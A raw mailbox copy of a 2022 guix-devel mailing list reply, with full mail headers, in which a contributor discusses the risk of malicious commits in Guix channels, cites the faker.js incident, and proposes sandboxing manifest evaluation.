From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: from mp12.migadu.com ([2001:41d0:2:bcc0::]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)) by ms5.migadu.com with LMTPS id yJDEN78t1WJxJgEAbAwnHQ (envelope-from ) for ; Mon, 18 Jul 2022 11:54:07 +0200 Received: from aspmx1.migadu.com ([2001:41d0:2:bcc0::]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)) by mp12.migadu.com with LMTPS id 4PFLN78t1WLFKQEAauVa8A (envelope-from ) for ; Mon, 18 Jul 2022 11:54:07 +0200 Received: from lists.gnu.org (lists.gnu.org [209.51.188.17]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by aspmx1.migadu.com (Postfix) with ESMTPS id AB34916FC8 for ; Mon, 18 Jul 2022 11:54:07 +0200 (CEST) Received: from localhost ([::1]:46206 helo=lists1p.gnu.org) by lists.gnu.org with esmtp (Exim 4.90_1) (envelope-from ) id 1oDNS2-0001Wr-Pw for larch@yhetil.org; Mon, 18 Jul 2022 05:54:06 -0400 Received: from eggs.gnu.org ([2001:470:142:3::10]:45114) by lists.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1oDNRc-0001UI-5B; Mon, 18 Jul 2022 05:53:41 -0400 Received: from mail-m973.mail.163.com ([123.126.97.3]:4608) by eggs.gnu.org with esmtp (Exim 4.90_1) (envelope-from ) id 1oDNRT-0003Wl-I7; Mon, 18 Jul 2022 05:53:36 -0400 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=163.com; s=s110527; h=From:Subject:Date:Message-ID:MIME-Version; bh=dLLtB FsVxMf9Te0B5TkoPScIGcAaNJvk7ddBvbYnW4E=; b=L4ofbbI9HSsOzEOPF8YOh 7reSdMnBi01MFamC18SFGH0pbQsZ7Qn/ZQIqOLjNTOdm0xJQEPCU8OM5gzEP8jbj NZE3pQQ5Mdkw/1DyJmEPVyP1vR2VslzOEJiCpzI/3b6nUme3YUxmmp9A6gi5dFmA 86+lAafYUmdul7d+ykyImM= Received: from asus-laptop (unknown [27.38.70.244]) by smtp3 (Coremail) with SMTP id G9xpCgCXpG2KLdViG4lWPw--.743S2; Mon, 18 Jul 2022 17:53:16 +0800 (CST) References: <87zghu5jex.fsf@inria.fr> <86fsj0nnxy.fsf@163.com> <87k08a4xmy.fsf@inria.fr> User-agent: mu4e 1.6.11; emacs 28.1 From: Zhu Zihao To: Ludovic =?utf-8?Q?Court=C3=A8s?= Cc: guix-science@gnu.org, guix-devel@gnu.org Subject: Re: =?utf-8?Q?=E2=80=9CBuilding?= a Secure Software Supply Chain with =?utf-8?B?R05VwqBHdWl44oCd?= Date: Mon, 18 Jul 2022 17:40:53 +0800 In-reply-to: <87k08a4xmy.fsf@inria.fr> Message-ID: <86v8rug31z.fsf@163.com> MIME-Version: 1.0 Content-Type: multipart/signed; boundary="=-=-="; micalg=pgp-sha256; protocol="application/pgp-signature" X-CM-TRANSID: G9xpCgCXpG2KLdViG4lWPw--.743S2 X-Coremail-Antispam: 1Uf129KBjvJXoW7Aw4UArWUZr4fXw4xKF18Grg_yoW8Ary8pF WfGr1YqFyDJFyrJryxCw4fXa4rtFsYyw15Xrn5KFWv9rW5Jwn2vFZaya1Y9F4xXrs2vw15 XrW0gryq93yUZrJanT9S1TB71UUUUUUqnTZGkaVYY2UrUUUUjbIjqfuFe4nvWSU5nxnvy2 9KBjDUYxBIdaVFxhVjvjDU0xZFpf9x0zizuWJUUUUU= X-Originating-IP: [27.38.70.244] X-CM-SenderInfo: pdoosuxxwbztlvw6il2tof0z/1tbiTwxCr1sGb-x41QAAsN Received-SPF: pass client-ip=123.126.97.3; envelope-from=all_but_last@163.com; helo=mail-m973.mail.163.com X-Spam_score_int: -20 X-Spam_score: -2.1 X-Spam_bar: -- X-Spam_report: (-2.1 / 5.0 requ) BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, DKIM_VALID_EF=-0.1, FREEMAIL_FROM=0.001, RCVD_IN_DNSWL_NONE=-0.0001, SPF_HELO_NONE=0.001, SPF_PASS=-0.001, T_SCC_BODY_TEXT_LINE=-0.01 autolearn=ham autolearn_force=no X-Spam_action: no action X-BeenThere: guix-devel@gnu.org X-Mailman-Version: 2.1.29 Precedence: list List-Id: "Development of GNU Guix and the GNU System distribution." List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: guix-devel-bounces+larch=yhetil.org@gnu.org Sender: "Guix-devel" X-Migadu-Flow: FLOW_IN X-Migadu-To: larch@yhetil.org X-Migadu-Country: US ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=yhetil.org; s=key1; t=1658138047; h=from:from:sender:sender:reply-to:subject:subject:date:date: message-id:message-id:to:to:cc:cc:mime-version:mime-version: content-type:content-type:in-reply-to:in-reply-to: references:references:list-id:list-help:list-unsubscribe: list-subscribe:list-post:dkim-signature; bh=dLLtBFsVxMf9Te0B5TkoPScIGcAaNJvk7ddBvbYnW4E=; b=ef29W104919NZI1+CiVJOSOzee68pMd+JdRDJkt2dSnhjspXhlXrr6HI021Br118mqlw98 V53suglF8AaKF4y3M4NOI8cN0re7L7tFf/ingZ16SmceS+7SIf1PGEIDASyCwkddA5uamH /nopzURPWGacVEcj6DKd9cFrKMIsJkouF6jeiYEUrUzNe2Pr5VJOIAIzLDWp+OfbEgrT0G +HfNZMMYvMDN6T9OZDArEikx7JWgSkPio7eXOksL3jPyZliHh1F2AJe5KiWmmA2CHeY8re I7Aa1tUPH3i/rYO4C0kFHK6K3Rtla/8EZG/WZqj188oVjF9iU+r5qZ1DY1ydfA== ARC-Seal: i=1; s=key1; d=yhetil.org; t=1658138047; a=rsa-sha256; cv=none; b=bY08kVHBIDve7F5uww6FM1QoqQBmy/yViDtJEkAy7y6K3bZiLZG5EyuYeq6xavvvh0D0Vi 1OZ93N0Xz7Y28+Zd8wDHvBQqIrePjBjRemcbx7pcePP0QOpAOkqbMOiIn+HnReqGGXvy6g 5rpVlAn3JZtg2pgJAoA0BKJRL0bFIt9ZLd5nv1WsiohGeUFy8be8bRd7QupFaxP4sxb1Oy RG0KAFqiMjbFLhlMTWxA/cUgcdNYJBzQn7UIjc58MphgKHjOT4CoOGQkwnDXR191U8A/sS tAT3u8ZXvZr9AjOarMkEXVagPEQdCaIA4CoE66BeoBFPT4pITXaiYKqornbt6w== ARC-Authentication-Results: i=1; aspmx1.migadu.com; dkim=pass header.d=163.com header.s=s110527 header.b=L4ofbbI9; dmarc=pass (policy=none) header.from=163.com; spf=pass (aspmx1.migadu.com: domain of "guix-devel-bounces+larch=yhetil.org@gnu.org" designates 209.51.188.17 as permitted sender) smtp.mailfrom="guix-devel-bounces+larch=yhetil.org@gnu.org" X-Migadu-Spam-Score: -8.03 Authentication-Results: aspmx1.migadu.com; dkim=pass header.d=163.com header.s=s110527 header.b=L4ofbbI9; dmarc=pass (policy=none) header.from=163.com; spf=pass (aspmx1.migadu.com: domain of "guix-devel-bounces+larch=yhetil.org@gnu.org" designates 209.51.188.17 as permitted sender) smtp.mailfrom="guix-devel-bounces+larch=yhetil.org@gnu.org" X-Migadu-Queue-Id: AB34916FC8 X-Spam-Score: -8.03 X-Migadu-Scanner: scn0.migadu.com X-TUID: 47XyhJPw/RtW --=-=-= Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Ludovic Court=C3=A8s writes: >> We have PGP sign and git commit chain to make sure the commits are >> committed by trusted people. But it's still possible for the channel >> owner to inject malicious code into the channel in a future commit. Like >> what Marak Squires did in faker.js project :( or the committer of Guix >> was attacked by an evil maid. > > I=E2=80=99m not aware of the faker.js story, do you have a link? https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors= -and-faker-breaking-thousands-of-apps/ Here's a detailed report about Marak and faker.js. >> In Nix flakes, there's pure evaluation to make sure no side-effectful >> code is allowed. But Guix channel is less restricted than a Nix flake. >> It's a important problem to make sure the evaluation is safe for the use= r. > > Yes, I understand. I don=E2=80=99t think that makes a practical differen= ce > though: when you pull from a Guix channel or fetch a Nix flake, that=E2= =80=99s > because you want to install software according to what that > channel/flake provides. So whether evil code is in the channel/flake > (as Scheme/Nix code) or in the package(s) themselves makes little > difference. > > Does that make sense? My two cents: When depolying a manifest, we use `guix package -p -m `, This command consists two parts. Guix will first evaluate the packages specified in the manifest, and build the profile. And then populate the profile to given destination. The first part can be done in a sandboxed environment, or a non-privileged account like "nobody". =2D-=20 Retrieve my PGP public key: gpg --recv-keys 481F5EEEBA425ADC13247C76A6E672D981B8E744 Zihao --=-=-= Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- iIsEARYIADMWIQRefA5qkqvnKdl/GTlmOX+E92aT+QUCYtUtiBUcYWxsX2J1dF9s YXN0QDE2My5jb20ACgkQZjl/hPdmk/mD5QEA0qChczIKHaHYMml66rlFx71eeCDU MGCBPe9MTrG+olsA/RYsIibEEpzZu0g6WxyWeNdFh1YvFg0aagvTICdcDb0K =PdG1 -----END PGP SIGNATURE----- --=-=-=--